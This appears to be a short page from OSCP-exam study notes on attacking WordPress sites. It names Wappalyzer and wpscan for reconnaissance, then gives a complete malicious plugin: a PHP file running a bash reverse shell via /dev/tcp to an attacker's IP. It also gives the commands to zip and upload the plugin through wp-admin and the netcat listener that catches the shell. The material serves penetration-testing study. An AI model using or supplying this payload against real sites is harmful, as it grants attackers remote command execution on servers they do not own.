Word Press

If you find that the website is using WordPress then you can scan the website using the wpscan tool to see vulnerability.

Way to find WordPress or not ??

This is a way to find out whether the website uses WordPress or not.

You can do this using a common extension called as Wappalyzer.

Wappalyzer – Get this Extension for 🦊 Firefox (en-US)addons.mozilla.org

Add this to your browser, visit any page, and click on it. It will show all the underlying technology used by the website.

You can see the current website is using WordPress.

Getting shell from the WordPress admin page

If you can add a plugin to the website. Then you can get the reverse shell from there.

Way to do this:

Make a .php file.

<?php
/**
* Plugin Name: Testing me
* Author: Cool !!

*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/<IP>/443 0>&1'")
?>

Add your IP address. and ZIP it.

zip reverse.zip reverse.php

Now visit the plugin installation page and upload the zip file.

http://target/wp-admin/plugin-install.php

Also, Start the Listener.

sudo rlwrap nc -lnvp 443

As soon as you will activate, the plugin, you will get the shell.

If you are not solving lab in the exam then you can try the below code also for getting a shell. Detailed steps can be found in the other methods link.

Other methods:

Reverse shell WordPress: Multiple MethodsHackercool Magazine

WordPress: Reverse ShellHacking Articles

PreviousSQLmap [Not Allowed in OSCP]NextInformation gathering

Last updated 10 months ago